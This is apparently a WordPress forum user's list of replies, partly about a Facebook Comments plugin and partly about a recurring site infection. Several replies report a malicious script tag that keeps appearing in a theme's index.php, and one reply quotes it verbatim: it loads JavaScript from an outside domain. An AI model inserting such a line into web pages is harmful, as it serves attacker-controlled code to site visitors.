mistercooper
Forum Replies Created
-
Forum: Plugins
In reply to: [Facebook Comments] Doesn't show on my siteAfter confiming that I had the wp_head hook and language attributes in place, the plugin still wasnt working for me on any browsers… Then on the 3door’s site I noticed this:
Facebook Javascript SDK:
In the plugin, this is inserted just before </body>. Technically, it is best to insert this directly after <body>, changing YOUR_APP_ID to your App ID:
<div id=”fb-root”></div>
<script>(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) {return;}
js = d.createElement(s); js.id = id;
js.src = “//connect.facebook.net/en_US/all.js#xfbml=1&appId=YOUR_APP_ID”;
fjs.parentNode.insertBefore(js, fjs);
}(document, ‘script’, ‘facebook-jssdk’));</script>ent.getElementById(‘fb-root’).appendChild(e);
}());
</script>The wording originally led me to believe this wasn’t necessary for some reason, and there is some sort of typo at the end which farted some javascript text on to the page, but after I tidied that up, the plugin started working! Hope this helps someone…
Thanks for the cool plugin Alex…
Forum: Plugins
In reply to: [Facebook Comments] Doesn't show on my siteI am having the exact same issue- after the post it only shows
Comments
CommentAFAIK the App ID is set up correctly and I’ve tried the two namespace checkboxes. What could be the limitation imposed by my theme? I made it from scratch.
Thank you, I love your plugins and recommend TwitterFeedPro to my clients all the time!
CooperForum: Fixing WordPress
In reply to: Malware links script from www.argoauto.netThe latest line is
<script type="text/javascript" src="http://denybonfante.com/app/Menu.php"></script>. Still no clue where it comes from. About once a month they appear at the top of my theme’s index.Forum: Fixing WordPress
In reply to: Malware links script from www.argoauto.netThis is consistent with my infection. Removed the argoauto.net script when it popped up a couple weeks ago, today the
<script type="text/javascript" src="redacted"></script>popped up. Both times it was the first line of index.php in the theme file.
Forum: Fixing WordPress
In reply to: Malware links script from www.argoauto.net@jzn21, I don’t think we have any plug ins or even wordpress version in common.
Forum: Fixing WordPress
In reply to: Malware links script from www.argoauto.netCan you elaborate just a little bit on which file you found the script link in? I’m having trouble locating it.
Thanks
CooperForum: Fixing WordPress
In reply to: Malware links script from www.argoauto.netThank you, I will look there!
Out of curiosity what version of WordPress is your install running? This client is on 3.3.1 and I’m wondering if this is still a vulnerability in the latest version.